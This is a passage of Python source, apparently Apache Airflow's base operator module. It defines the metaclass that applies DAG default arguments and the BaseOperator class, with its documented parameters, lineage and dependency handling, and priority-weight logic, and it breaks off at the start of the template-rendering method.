#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Base operator for all operators."""
import abc
import copy
import functools
import logging
import sys
import warnings
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from inspect import signature
from types import FunctionType
from typing import (
TYPE_CHECKING,
Any,
Callable,
ClassVar,
Dict,
FrozenSet,
Iterable,
List,
Optional,
Sequence,
Set,
Tuple,
Type,
TypeVar,
Union,
cast,
)
import attr
import jinja2
import pendulum
from dateutil.relativedelta import relativedelta
from sqlalchemy.orm import Session
from sqlalchemy.orm.exc import NoResultFound
import airflow.templates
from airflow.compat.functools import cached_property
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskDeferred
from airflow.lineage import apply_lineage, prepare_lineage
from airflow.models.base import Operator
from airflow.models.param import ParamsDict
from airflow.models.pool import Pool
from airflow.models.taskinstance import Context, TaskInstance, clear_task_instances
from airflow.models.taskmixin import TaskMixin
from airflow.models.xcom import XCOM_RETURN_KEY
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.ti_deps.deps.not_in_retry_period_dep import NotInRetryPeriodDep
from airflow.ti_deps.deps.not_previously_skipped_dep import NotPreviouslySkippedDep
from airflow.ti_deps.deps.prev_dagrun_dep import PrevDagrunDep
from airflow.ti_deps.deps.trigger_rule_dep import TriggerRuleDep
from airflow.triggers.base import BaseTrigger
from airflow.utils import timezone
from airflow.utils.edgemodifier import EdgeModifier
from airflow.utils.helpers import render_template_as_native, render_template_to_string, validate_key
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.operator_resources import Resources
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.trigger_rule import TriggerRule
from airflow.utils.weight_rule import WeightRule
if TYPE_CHECKING:
from airflow.models.dag import DAG
from airflow.models.xcom_arg import XComArg
from airflow.utils.task_group import TaskGroup
ScheduleInterval = Union[str, timedelta, relativedelta]
TaskStateChangeCallback = Callable[[Context], None]
TaskPreExecuteHook = Callable[[Context], None]
TaskPostExecuteHook = Callable[[Context, Any], None]
T = TypeVar('T', bound=FunctionType)
class BaseOperatorMeta(abc.ABCMeta):
"""Metaclass of BaseOperator."""
@classmethod
def _apply_defaults(cls, func: T) -> T:
"""
Function decorator that looks for an argument named "default_args" and
fills in unspecified arguments from it.
Since Python 2.* isn't clear about which arguments are missing when
calling a function, and since this can be quite confusing with multi-level
inheritance and argument defaults, this decorator also alerts with
specific information about the missing arguments.
"""
# Cache inspect.signature for the wrapper closure to avoid calling it
# at every decorated invocation. This is separate sig_cache created
# per decoration, i.e. each function decorated using apply_defaults will
# have a different sig_cache.
sig_cache = signature(func)
non_optional_args = {
name
for (name, param) in sig_cache.parameters.items()
if param.default == param.empty
and param.name != 'self'
and param.kind not in (param.VAR_POSITIONAL, param.VAR_KEYWORD)
}
class autostacklevel_warn:
def __init__(self):
self.warnings = __import__('warnings')
def __getattr__(self, name):
return getattr(self.warnings, name)
def __dir__(self):
return dir(self.warnings)
def warn(self, message, category=None, stacklevel=1, source=None):
self.warnings.warn(message, category, stacklevel + 2, source)
if func.__globals__.get('warnings') is sys.modules['warnings']:
# Yes, this is slightly hacky, but it _automatically_ sets the right
# stacklevel parameter to `warnings.warn` to ignore the decorator. Now
# that the decorator is applied automatically, this makes the needed
# stacklevel parameter less confusing.
func.__globals__['warnings'] = autostacklevel_warn()
@functools.wraps(func)
def apply_defaults(self, *args: Any, **kwargs: Any) -> Any:
from airflow.models.dag import DagContext
from airflow.utils.task_group import TaskGroupContext
if len(args) > 0:
raise AirflowException("Use keyword arguments when initializing operators")
dag_args: Dict[str, Any] = {}
dag_params = ParamsDict()
dag: Optional[DAG] = kwargs.get('dag') or DagContext.get_current_dag()
if dag:
dag_args = copy.copy(dag.default_args) or dag_args
dag_params = copy.deepcopy(dag.params) or dag_params
task_group = TaskGroupContext.get_current_task_group(dag)
if task_group:
dag_args.update(task_group.default_args)
params = kwargs.get('params', {}) or {}
dag_params.update(params)
default_args = {}
if 'default_args' in kwargs:
default_args = kwargs['default_args']
if 'params' in default_args:
dag_params.update(default_args['params'])
del default_args['params']
dag_args.update(default_args)
default_args = dag_args
for arg in sig_cache.parameters:
if arg not in kwargs and arg in default_args:
kwargs[arg] = default_args[arg]
missing_args = list(non_optional_args - set(kwargs))
if missing_args:
msg = f"Argument {missing_args} is required"
raise AirflowException(msg)
if dag_params:
kwargs['params'] = dag_params
if default_args:
kwargs['default_args'] = default_args
if hasattr(self, '_hook_apply_defaults'):
args, kwargs = self._hook_apply_defaults(*args, **kwargs)
result = func(self, *args, **kwargs)
# Here we set upstream task defined by XComArgs passed to template fields of the operator
self.set_xcomargs_dependencies()
# Mark instance as instantiated https://docs.python.org/3/tutorial/classes.html#private-variables
self._BaseOperator__instantiated = True
return result
return cast(T, apply_defaults)
def __new__(cls, name, bases, namespace, **kwargs):
new_cls = super().__new__(cls, name, bases, namespace, **kwargs)
new_cls.__init__ = cls._apply_defaults(new_cls.__init__)
return new_cls
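# A minimal sketch of the default_args flow that the decorator above implements
# (dag_id/task_id values are hypothetical; DummyOperator is just a stand-in):
#
#     from datetime import datetime, timedelta
#     from airflow import DAG
#     from airflow.operators.dummy import DummyOperator
#
#     with DAG(
#         dag_id="defaults_demo",
#         start_date=datetime(2021, 1, 1),
#         default_args={"retries": 2, "retry_delay": timedelta(minutes=5)},
#     ) as dag:
#         # 'retries' and 'retry_delay' are not passed explicitly, so the wrapped
#         # __init__ fills them in from dag.default_args.
#         noop = DummyOperator(task_id="noop")
#     assert noop.retries == 2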
@functools.total_ordering
class BaseOperator(Operator, LoggingMixin, TaskMixin, metaclass=BaseOperatorMeta):
"""
Abstract base class for all operators. Since operators create objects that
become nodes in the dag, BaseOperator contains many recursive methods for
dag crawling behavior. To derive this class, you are expected to override
the constructor as well as the 'execute' method.
Operators derived from this class should perform or trigger certain tasks
synchronously (wait for completion). Examples of operators could be an
operator that runs a Pig job (PigOperator), a sensor operator that
waits for a partition to land in Hive (HiveSensorOperator), or one that
moves data from Hive to MySQL (Hive2MySqlOperator). Instances of these
operators (tasks) target specific operations, running specific scripts,
functions or data transfers.
This class is abstract and shouldn't be instantiated. Instantiating a
class derived from this one results in the creation of a task object,
which ultimately becomes a node in DAG objects. Task dependencies should
be set by using the set_upstream and/or set_downstream methods.
:param task_id: a unique, meaningful id for the task
:type task_id: str
:param owner: the owner of the task. Using a meaningful description
(e.g. user/person/team/role name) to clarify ownership is recommended.
:type owner: str
:param email: the 'to' email address(es) used in email alerts. This can be a
single email or multiple ones. Multiple addresses can be specified as a
comma or semi-colon separated string or by passing a list of strings.
:type email: str or list[str]
:param email_on_retry: Indicates whether email alerts should be sent when a
task is retried
:type email_on_retry: bool
:param email_on_failure: Indicates whether email alerts should be sent when
a task failed
:type email_on_failure: bool
:param retries: the number of retries that should be performed before
failing the task
:type retries: int
:param retry_delay: delay between retries, can be set as ``timedelta`` or
``float`` seconds, which will be converted into ``timedelta``,
the default is ``timedelta(seconds=300)``.
:type retry_delay: datetime.timedelta or float
:param retry_exponential_backoff: allow progressively longer waits between
retries by using exponential backoff algorithm on retry delay (delay
will be converted into seconds)
:type retry_exponential_backoff: bool
:param max_retry_delay: maximum delay interval between retries, can be set as
``timedelta`` or ``float`` seconds, which will be converted into ``timedelta``.
:type max_retry_delay: datetime.timedelta or float
:param start_date: The ``start_date`` for the task, determines
the ``execution_date`` for the first task instance. The best practice
is to have the start_date rounded
to your DAG's ``schedule_interval``. Daily jobs have their start_date
some day at 00:00:00, hourly jobs have their start_date at 00:00
of a specific hour. Note that Airflow simply looks at the latest
``execution_date`` and adds the ``schedule_interval`` to determine
the next ``execution_date``. It is also very important
to note that different tasks' dependencies
need to line up in time. If task A depends on task B and their
start_dates are offset in a way that their execution_dates don't line
up, A's dependencies will never be met. If you are looking to delay
a task, for example running a daily task at 2AM, look into the
``TimeSensor`` and ``TimeDeltaSensor``. We advise against using
dynamic ``start_date`` and recommend using fixed ones. Read the
FAQ entry about start_date for more information.
:type start_date: datetime.datetime
:param end_date: if specified, the scheduler won't go beyond this date
:type end_date: datetime.datetime
:param depends_on_past: when set to true, task instances will run
sequentially and only if the previous instance has succeeded or has been skipped.
The task instance for the start_date is allowed to run.
:type depends_on_past: bool
:param wait_for_downstream: when set to true, an instance of task
X will wait for tasks immediately downstream of the previous instance
of task X to finish successfully or be skipped before it runs. This is useful if the
different instances of a task X alter the same asset, and this asset
is used by tasks downstream of task X. Note that depends_on_past
is forced to True wherever wait_for_downstream is used. Also note that
only tasks *immediately* downstream of the previous task instance are waited
for; the statuses of any tasks further downstream are ignored.
:type wait_for_downstream: bool
:param dag: a reference to the dag the task is attached to (if any)
:type dag: airflow.models.DAG
:param priority_weight: priority weight of this task against other tasks.
This allows the executor to trigger higher priority tasks before
others when things get backed up. Set priority_weight as a higher
number for more important tasks.
:type priority_weight: int
:param weight_rule: weighting method used for the effective total
priority weight of the task. Options are:
``{ downstream | upstream | absolute }`` default is ``downstream``
When set to ``downstream`` the effective weight of the task is the
aggregate sum of all downstream descendants. As a result, upstream
tasks will have higher weight and will be scheduled more aggressively
when using positive weight values. This is useful when you have
multiple dag run instances and want all upstream tasks to
complete for all runs before each dag can continue processing
downstream tasks. When set to ``upstream`` the effective weight is the
aggregate sum of all upstream ancestors. This is the opposite where
downstream tasks have higher weight and will be scheduled more
aggressively when using positive weight values. This is useful when you
have multiple dag run instances and prefer to have each dag complete
before starting upstream tasks of other dags. When set to
``absolute``, the effective weight is the exact ``priority_weight``
specified without additional weighting. You may want to do this when
you know exactly what priority weight each task should have.
Additionally, when set to ``absolute``, there is a bonus effect of
significantly speeding up the task creation process for very large
DAGs. Options can be set as a string or using the constants defined in
the static class ``airflow.utils.WeightRule``
:type weight_rule: str
:param queue: which queue to target when running this job. Not
all executors implement queue management; the CeleryExecutor
does support targeting specific queues.
:type queue: str
:param pool: the slot pool this task should run in, slot pools are a
way to limit concurrency for certain tasks
:type pool: str
:param pool_slots: the number of pool slots this task should use (>= 1).
Values less than 1 are not allowed.
:type pool_slots: int
:param sla: time by which the job is expected to succeed. Note that
this represents the ``timedelta`` after the period is closed. For
example, if you set an SLA of 1 hour, the scheduler would send an email
soon after 1:00AM on ``2016-01-02`` if the ``2016-01-01`` instance
has not succeeded yet.
The scheduler pays special attention to jobs with an SLA and sends
alert emails for SLA misses. SLA misses are also recorded in the
database for future reference. All tasks that share the same SLA time
get bundled in a single email, sent soon after that time. SLA
notifications are sent once and only once for each task instance.
:type sla: datetime.timedelta
:param execution_timeout: maximum time allowed for the execution of
this task instance; if it runs longer than this, it will raise and fail.
:type execution_timeout: datetime.timedelta
:param on_failure_callback: a function to be called when a task instance
of this task fails. A context dictionary is passed as a single
parameter to this function. The context contains references to objects
related to the task instance and is documented under the macros
section of the API.
:type on_failure_callback: TaskStateChangeCallback
:param on_execute_callback: much like the ``on_failure_callback`` except
that it is executed right before the task is executed.
:type on_execute_callback: TaskStateChangeCallback
:param on_retry_callback: much like the ``on_failure_callback`` except
that it is executed when retries occur.
:type on_retry_callback: TaskStateChangeCallback
:param on_success_callback: much like the ``on_failure_callback`` except
that it is executed when the task succeeds.
:type on_success_callback: TaskStateChangeCallback
:param pre_execute: a function to be called immediately before task
execution, receiving a context dictionary; raising an exception will
prevent the task from being executed.
|experimental|
:type pre_execute: TaskPreExecuteHook
:param post_execute: a function to be called immediately after task
execution, receiving a context dictionary and task result; raising an
exception will prevent the task from succeeding.
|experimental|
:type post_execute: TaskPostExecuteHook
:param trigger_rule: defines the rule by which dependencies are applied
for the task to get triggered. Options are:
``{ all_success | all_failed | all_done | one_success |
one_failed | none_failed | none_failed_min_one_success | none_skipped | always}``
default is ``all_success``. Options can be set as string or
using the constants defined in the static class
``airflow.utils.TriggerRule``
:type trigger_rule: str
:param resources: A map of resource parameter names (the argument names of the
Resources constructor) to their values.
:type resources: dict
:param run_as_user: unix username to impersonate while running the task
:type run_as_user: str
:param max_active_tis_per_dag: When set, limits the number of concurrent
runs of this task across execution_dates.
:type max_active_tis_per_dag: int
:param executor_config: Additional task-level configuration parameters that are
interpreted by a specific executor. Parameters are namespaced by the name of
executor.
**Example**: to run this task in a specific docker container through
the KubernetesExecutor ::
MyOperator(...,
executor_config={
"KubernetesExecutor":
{"image": "myCustomDockerImage"}
}
)
:type executor_config: dict
:param do_xcom_push: if True, an XCom is pushed containing the Operator's
result
:type do_xcom_push: bool
:param task_group: The TaskGroup to which the task should belong. This is typically provided when not
using a TaskGroup as a context manager.
:type task_group: airflow.utils.task_group.TaskGroup
:param doc: Add documentation or notes to your Task objects that is visible in
Task Instance details View in the Webserver
:type doc: str
:param doc_md: Add documentation (in Markdown format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_md: str
:param doc_rst: Add documentation (in RST format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_rst: str
:param doc_json: Add documentation (in JSON format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_json: str
:param doc_yaml: Add documentation (in YAML format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_yaml: str
"""
# For derived classes to define which fields will get jinjaified
template_fields: Iterable[str] = ()
# Defines which files extensions to look for in the templated fields
template_ext: Iterable[str] = ()
# Template field renderers indicating type of the field, for example sql, json, bash
template_fields_renderers: Dict[str, str] = {}
# Defines the color in the UI
ui_color = '#fff' # type: str
ui_fgcolor = '#000' # type: str
pool = "" # type: str
# base list which includes all the attrs that don't need deep copy.
_base_operator_shallow_copy_attrs: Tuple[str, ...] = (
'user_defined_macros',
'user_defined_filters',
'params',
'_log',
)
# each operator should override this class attr for shallow copy attrs.
shallow_copy_attrs: Tuple[str, ...] = ()
# Defines the operator level extra links
operator_extra_links: Iterable['BaseOperatorLink'] = ()
# The _serialized_fields are lazily loaded when get_serialized_fields() method is called
__serialized_fields: Optional[FrozenSet[str]] = None
_comps = {
'task_id',
'dag_id',
'owner',
'email',
'email_on_retry',
'retry_delay',
'retry_exponential_backoff',
'max_retry_delay',
'start_date',
'end_date',
'depends_on_past',
'wait_for_downstream',
'priority_weight',
'sla',
'execution_timeout',
'on_execute_callback',
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
'do_xcom_push',
}
# Defines if the operator supports lineage without manual definitions
supports_lineage = False
# If True then the class constructor was called
__instantiated = False
# Set to True before calling execute method
_lock_for_execution = False
_dag: Optional["DAG"] = None
# subdag parameter is only set for SubDagOperator.
# Setting it to None by default as other Operators do not have that field
subdag: Optional["DAG"] = None
def __init__(
self,
task_id: str,
owner: str = conf.get('operators', 'DEFAULT_OWNER'),
email: Optional[Union[str, Iterable[str]]] = None,
email_on_retry: bool = conf.getboolean('email', 'default_email_on_retry', fallback=True),
email_on_failure: bool = conf.getboolean('email', 'default_email_on_failure', fallback=True),
retries: Optional[int] = conf.getint('core', 'default_task_retries', fallback=0),
retry_delay: Union[timedelta, float] = timedelta(seconds=300),
retry_exponential_backoff: bool = False,
max_retry_delay: Optional[Union[timedelta, float]] = None,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
depends_on_past: bool = False,
wait_for_downstream: bool = False,
dag: Optional['DAG'] = None,
params: Optional[Dict] = None,
default_args: Optional[Dict] = None,
priority_weight: int = 1,
weight_rule: str = conf.get('core', 'default_task_weight_rule', fallback=WeightRule.DOWNSTREAM),
queue: str = conf.get('operators', 'default_queue'),
pool: Optional[str] = None,
pool_slots: int = 1,
sla: Optional[timedelta] = None,
execution_timeout: Optional[timedelta] = None,
on_execute_callback: Optional[TaskStateChangeCallback] = None,
on_failure_callback: Optional[TaskStateChangeCallback] = None,
on_success_callback: Optional[TaskStateChangeCallback] = None,
on_retry_callback: Optional[TaskStateChangeCallback] = None,
pre_execute: Optional[TaskPreExecuteHook] = None,
post_execute: Optional[TaskPostExecuteHook] = None,
trigger_rule: str = TriggerRule.ALL_SUCCESS,
resources: Optional[Dict] = None,
run_as_user: Optional[str] = None,
task_concurrency: Optional[int] = None,
max_active_tis_per_dag: Optional[int] = None,
executor_config: Optional[Dict] = None,
do_xcom_push: bool = True,
inlets: Optional[Any] = None,
outlets: Optional[Any] = None,
task_group: Optional["TaskGroup"] = None,
doc: Optional[str] = None,
doc_md: Optional[str] = None,
doc_json: Optional[str] = None,
doc_yaml: Optional[str] = None,
doc_rst: Optional[str] = None,
**kwargs,
):
from airflow.models.dag import DagContext
from airflow.utils.task_group import TaskGroupContext
super().__init__()
if kwargs:
if not conf.getboolean('operators', 'ALLOW_ILLEGAL_ARGUMENTS'):
raise AirflowException(
f"Invalid arguments were passed to {self.__class__.__name__} (task_id: {task_id}). "
f"Invalid arguments were:\n**kwargs: {kwargs}",
)
warnings.warn(
f'Invalid arguments were passed to {self.__class__.__name__} (task_id: {task_id}). '
'Support for passing such arguments will be dropped in future. '
f'Invalid arguments were:\n**kwargs: {kwargs}',
category=PendingDeprecationWarning,
stacklevel=3,
)
validate_key(task_id)
self.task_id = task_id
self.label = task_id
dag = dag or DagContext.get_current_dag()
task_group = task_group or TaskGroupContext.get_current_task_group(dag)
if task_group:
self.task_id = task_group.child_id(task_id)
task_group.add(self)
self.owner = owner
self.email = email
self.email_on_retry = email_on_retry
self.email_on_failure = email_on_failure
self.execution_timeout = execution_timeout
self.on_execute_callback = on_execute_callback
self.on_failure_callback = on_failure_callback
self.on_success_callback = on_success_callback
self.on_retry_callback = on_retry_callback
self._pre_execute_hook = pre_execute
self._post_execute_hook = post_execute
self.start_date = start_date
if start_date and not isinstance(start_date, datetime):
self.log.warning("start_date for %s isn't datetime.datetime", self)
elif start_date:
self.start_date = timezone.convert_to_utc(start_date)
self.end_date = end_date
if end_date:
self.end_date = timezone.convert_to_utc(end_date)
if retries is not None and not isinstance(retries, int):
try:
parsed_retries = int(retries)
except (TypeError, ValueError):
raise AirflowException(f"'retries' type must be int, not {type(retries).__name__}")
id = task_id
if dag:
id = f'{dag.dag_id}.{id}'
self.log.warning("Implicitly converting 'retries' for task %s from %r to int", id, retries)
retries = parsed_retries
self.executor_config = executor_config or {}
self.run_as_user = run_as_user
self.retries = retries
self.queue = queue
self.pool = Pool.DEFAULT_POOL_NAME if pool is None else pool
self.pool_slots = pool_slots
if self.pool_slots < 1:
dag_str = f" in dag {dag.dag_id}" if dag else ""
raise ValueError(f"pool slots for {self.task_id}{dag_str} cannot be less than 1")
self.sla = sla
if trigger_rule == "dummy":
warnings.warn(
"dummy Trigger Rule is deprecated. Please use `TriggerRule.ALWAYS`.",
DeprecationWarning,
stacklevel=2,
)
trigger_rule = TriggerRule.ALWAYS
if trigger_rule == "none_failed_or_skipped":
warnings.warn(
"none_failed_or_skipped Trigger Rule is deprecated. "
"Please use `none_failed_min_one_success`.",
DeprecationWarning,
stacklevel=2,
)
trigger_rule = TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS
if not TriggerRule.is_valid(trigger_rule):
raise AirflowException(
f"The trigger_rule must be one of {TriggerRule.all_triggers()},"
f"'{dag.dag_id if dag else ''}.{task_id}'; received '{trigger_rule}'."
)
self.trigger_rule = trigger_rule
self.depends_on_past = depends_on_past
self.wait_for_downstream = wait_for_downstream
if wait_for_downstream:
self.depends_on_past = True
if isinstance(retry_delay, timedelta):
self.retry_delay = retry_delay
else:
self.log.debug("Retry_delay isn't timedelta object, assuming secs")
self.retry_delay = timedelta(seconds=retry_delay)
self.retry_exponential_backoff = retry_exponential_backoff
self.max_retry_delay = max_retry_delay
if max_retry_delay:
if isinstance(max_retry_delay, timedelta):
self.max_retry_delay = max_retry_delay
else:
self.log.debug("max_retry_delay isn't a timedelta object, assuming secs")
self.max_retry_delay = timedelta(seconds=max_retry_delay)
# At execution_time this becomes a normal dict
self.params: Union[ParamsDict, dict] = ParamsDict(params)
if priority_weight is not None and not isinstance(priority_weight, int):
raise AirflowException(
f"`priority_weight` for task '{self.task_id}' only accepts integers, "
f"received '{type(priority_weight)}'."
)
self.priority_weight = priority_weight
if not WeightRule.is_valid(weight_rule):
raise AirflowException(
f"The weight_rule must be one of "
f"{WeightRule.all_weight_rules},'{dag.dag_id if dag else ''}.{task_id}'; "
f"received '{weight_rule}'."
)
self.weight_rule = weight_rule
self.resources: Optional[Resources] = Resources(**resources) if resources else None
if task_concurrency and not max_active_tis_per_dag:
# TODO: Remove in Airflow 3.0
warnings.warn(
"The 'task_concurrency' parameter is deprecated. Please use 'max_active_tis_per_dag'.",
DeprecationWarning,
stacklevel=2,
)
max_active_tis_per_dag = task_concurrency
self.max_active_tis_per_dag = max_active_tis_per_dag
self.do_xcom_push = do_xcom_push
self.doc_md = doc_md
self.doc_json = doc_json
self.doc_yaml = doc_yaml
self.doc_rst = doc_rst
self.doc = doc
# Private attributes
self._upstream_task_ids: Set[str] = set()
self._downstream_task_ids: Set[str] = set()
if dag:
self.dag = dag
self._log = logging.getLogger("airflow.task.operators")
# Lineage
self.inlets: List = []
self.outlets: List = []
self._inlets: List = []
self._outlets: List = []
if inlets:
self._inlets = (
inlets
if isinstance(inlets, list)
else [
inlets,
]
)
if outlets:
self._outlets = (
outlets
if isinstance(outlets, list)
else [
outlets,
]
)
def __eq__(self, other):
if type(self) is type(other):
# Use getattr() instead of __dict__ as __dict__ doesn't return
# correct values for properties.
return all(getattr(self, c, None) == getattr(other, c, None) for c in self._comps)
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
hash_components = [type(self)]
for component in self._comps:
val = getattr(self, component, None)
try:
hash(val)
hash_components.append(val)
except TypeError:
hash_components.append(repr(val))
return hash(tuple(hash_components))
# including lineage information
def __or__(self, other):
"""
Called for [This Operator] | [Operator]. The inlets of other
will be set to pick up the outlets from this operator. Other will
be set as a downstream task of this operator.
"""
if isinstance(other, BaseOperator):
if not self._outlets and not self.supports_lineage:
raise ValueError("No outlets defined for this operator")
other.add_inlets([self.task_id])
self.set_downstream(other)
else:
raise TypeError(f"Right hand side ({other}) is not an Operator")
return self
# /Composing Operators ---------------------------------------------
def __gt__(self, other):
"""
Called for [Operator] > [Outlet], so that if other is an attr annotated object
it is set as an outlet of this Operator.
"""
if not isinstance(other, Iterable):
other = [other]
for obj in other:
if not attr.has(obj):
raise TypeError(f"Left hand side ({obj}) is not an outlet")
self.add_outlets(other)
return self
def __lt__(self, other):
"""
Called for [Inlet] > [Operator] or [Operator] < [Inlet], so that if other is
an attr annotated object it is set as an inlet to this operator
"""
if not isinstance(other, Iterable):
other = [other]
for obj in other:
if not attr.has(obj):
raise TypeError(f"{obj} cannot be an inlet")
self.add_inlets(other)
return self
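# An illustrative sketch of the lineage operators defined above, using the
# attr-annotated File entity; 'extract'/'transform' are hypothetical tasks
# and the URL is made up:
#
#     from airflow.lineage.entities import File
#
#     raw = File(url="s3://bucket/raw.csv")
#
#     extract > raw        # __gt__: 'raw' becomes an outlet of 'extract'
#     transform < raw      # __lt__: 'raw' becomes an inlet of 'transform'
#     extract | transform  # __or__: 'transform' inlets pick up 'extract' outlets,
#                          #         and 'transform' is set downstream of 'extract'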
def __setattr__(self, key, value):
super().__setattr__(key, value)
if self._lock_for_execution:
# Skip any custom behaviour during execute
return
if self.__instantiated and key in self.template_fields:
# Resolve upstreams set by assigning an XComArg after initializing
# an operator, example:
# op = BashOperator()
# op.bash_command = "sleep 1"
self.set_xcomargs_dependencies()
def add_inlets(self, inlets: Iterable[Any]):
"""Sets inlets to this operator"""
self._inlets.extend(inlets)
def add_outlets(self, outlets: Iterable[Any]):
"""Defines the outlets of this operator"""
self._outlets.extend(outlets)
def get_inlet_defs(self):
""":return: list of inlets defined for this operator"""
return self._inlets
def get_outlet_defs(self):
""":return: list of outlets defined for this operator"""
return self._outlets
@property
def dag(self) -> 'DAG':
"""Returns the Operator's DAG if set, otherwise raises an error"""
if self._dag:
return self._dag
else:
raise AirflowException(f'Operator {self} has not been assigned to a DAG yet')
@dag.setter
def dag(self, dag: Optional['DAG']):
"""
Operators can be assigned to one DAG, one time. Repeat assignments to
that same DAG are ok.
"""
from airflow.models.dag import DAG
if dag is None:
self._dag = None
return
if not isinstance(dag, DAG):
raise TypeError(f'Expected DAG; received {dag.__class__.__name__}')
elif self.has_dag() and self.dag is not dag:
raise AirflowException(f"The DAG assigned to {self} can not be changed.")
elif self.task_id not in dag.task_dict:
dag.add_task(self)
elif self.task_id in dag.task_dict and dag.task_dict[self.task_id] is not self:
dag.add_task(self)
self._dag = dag
def has_dag(self):
"""Returns True if the Operator has been assigned to a DAG."""
return self._dag is not None
@property
def dag_id(self) -> str:
"""Returns dag id if it has one or an adhoc + owner"""
if self.has_dag():
return self.dag.dag_id
else:
return 'adhoc_' + self.owner
deps: Iterable[BaseTIDep] = frozenset(
{
NotInRetryPeriodDep(),
PrevDagrunDep(),
TriggerRuleDep(),
NotPreviouslySkippedDep(),
}
)
"""
Returns the set of dependencies for the operator. These differ from execution
context dependencies in that they are specific to tasks and can be
extended/overridden by subclasses.
"""
def prepare_for_execution(self) -> "BaseOperator":
"""
Lock the task for execution to disable custom action in ``__setattr__`` and
return a copy of the task.
"""
other = copy.copy(self)
other._lock_for_execution = True
return other
def set_xcomargs_dependencies(self) -> None:
"""
Resolves upstream dependencies of a task. In this way, passing an ``XComArg``
as the value for a template field will result in creating an upstream relation
between the two tasks.
**Example**: ::
with DAG(...):
generate_content = GenerateContentOperator(task_id="generate_content")
send_email = EmailOperator(..., html_content=generate_content.output)
# This is equivalent to
with DAG(...):
generate_content = GenerateContentOperator(task_id="generate_content")
send_email = EmailOperator(
..., html_content="{{ task_instance.xcom_pull('generate_content') }}"
)
generate_content >> send_email
"""
from airflow.models.xcom_arg import XComArg
def apply_set_upstream(arg: Any):
if isinstance(arg, XComArg):
self.set_upstream(arg.operator)
elif isinstance(arg, (tuple, set, list)):
for elem in arg:
apply_set_upstream(elem)
elif isinstance(arg, dict):
for elem in arg.values():
apply_set_upstream(elem)
elif hasattr(arg, "template_fields"):
for elem in arg.template_fields:
apply_set_upstream(elem)
for field in self.template_fields:
if hasattr(self, field):
arg = getattr(self, field)
apply_set_upstream(arg)
@property
def priority_weight_total(self) -> int:
"""
Total priority weight for the task. It might include all upstream or downstream
tasks, depending on the weight rule.
- WeightRule.ABSOLUTE - only own weight
- WeightRule.DOWNSTREAM - adds priority weight of all downstream tasks
- WeightRule.UPSTREAM - adds priority weight of all upstream tasks
"""
if self.weight_rule == WeightRule.ABSOLUTE:
return self.priority_weight
elif self.weight_rule == WeightRule.DOWNSTREAM:
upstream = False
elif self.weight_rule == WeightRule.UPSTREAM:
upstream = True
else:
upstream = False
if not self._dag:
return self.priority_weight
from airflow.models.dag import DAG
dag: DAG = self._dag
return self.priority_weight + sum(
map(
lambda task_id: dag.task_dict[task_id].priority_weight,
self.get_flat_relative_ids(upstream=upstream),
)
)
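# A small worked example of priority_weight_total with the default
# priority_weight=1 and weight_rule="downstream" (hypothetical tasks a, b, c):
#
#     a >> b >> c
#     # a.priority_weight_total == 3  (own weight + b + c)
#     # b.priority_weight_total == 2  (own weight + c)
#     # c.priority_weight_total == 1  (no downstream tasks)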
@cached_property
def operator_extra_link_dict(self) -> Dict[str, Any]:
"""Returns dictionary of all extra links for the operator"""
op_extra_links_from_plugin: Dict[str, Any] = {}
from airflow import plugins_manager
plugins_manager.initialize_extra_operators_links_plugins()
if plugins_manager.operator_extra_links is None:
raise AirflowException("Can't load operators")
for ope in plugins_manager.operator_extra_links:
if ope.operators and self.__class__ in ope.operators:
op_extra_links_from_plugin.update({ope.name: ope})
operator_extra_links_all = {link.name: link for link in self.operator_extra_links}
# Extra links defined in Plugins overrides operator links defined in operator
operator_extra_links_all.update(op_extra_links_from_plugin)
return operator_extra_links_all
@cached_property
def global_operator_extra_link_dict(self) -> Dict[str, Any]:
"""Returns dictionary of all global extra links"""
from airflow import plugins_manager
plugins_manager.initialize_extra_operators_links_plugins()
if plugins_manager.global_operator_extra_links is None:
raise AirflowException("Can't load operators")
return {link.name: link for link in plugins_manager.global_operator_extra_links}
@prepare_lineage
def pre_execute(self, context: Any):
"""This hook is triggered right before self.execute() is called."""
if self._pre_execute_hook is not None:
self._pre_execute_hook(context)
def execute(self, context: Any):
"""
This is the main method to derive when creating an operator.
Context is the same dictionary used when rendering jinja templates.
Refer to get_template_context for more context.
"""
raise NotImplementedError()
@apply_lineage
def post_execute(self, context: Any, result: Any = None):
"""
This hook is triggered right after self.execute() is called.
It is passed the execution context and any results returned by the
operator.
"""
if self._post_execute_hook is not None:
self._post_execute_hook(context, result)
def on_kill(self) -> None:
"""
Override this method to cleanup subprocesses when a task instance
gets killed. Any use of the threading, subprocess or multiprocessing
module within an operator needs to be cleaned up or it will leave
ghost processes behind.
"""
def __deepcopy__(self, memo):
"""
Hack sorting double chained task lists by task_id to avoid hitting
max_depth on deepcopy operations.
"""
sys.setrecursionlimit(5000) # TODO fix this in a better way
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
shallow_copy = cls.shallow_copy_attrs + cls._base_operator_shallow_copy_attrs
for k, v in self.__dict__.items():
if k not in shallow_copy:
setattr(result, k, copy.deepcopy(v, memo))
else:
setattr(result, k, copy.copy(v))
return result
def __getstate__(self):
state = dict(self.__dict__)
del state['_log']
return state
def __setstate__(self, state):
self.__dict__ = state
self._log = logging.getLogger("airflow.task.operators")
def render_template_fields(
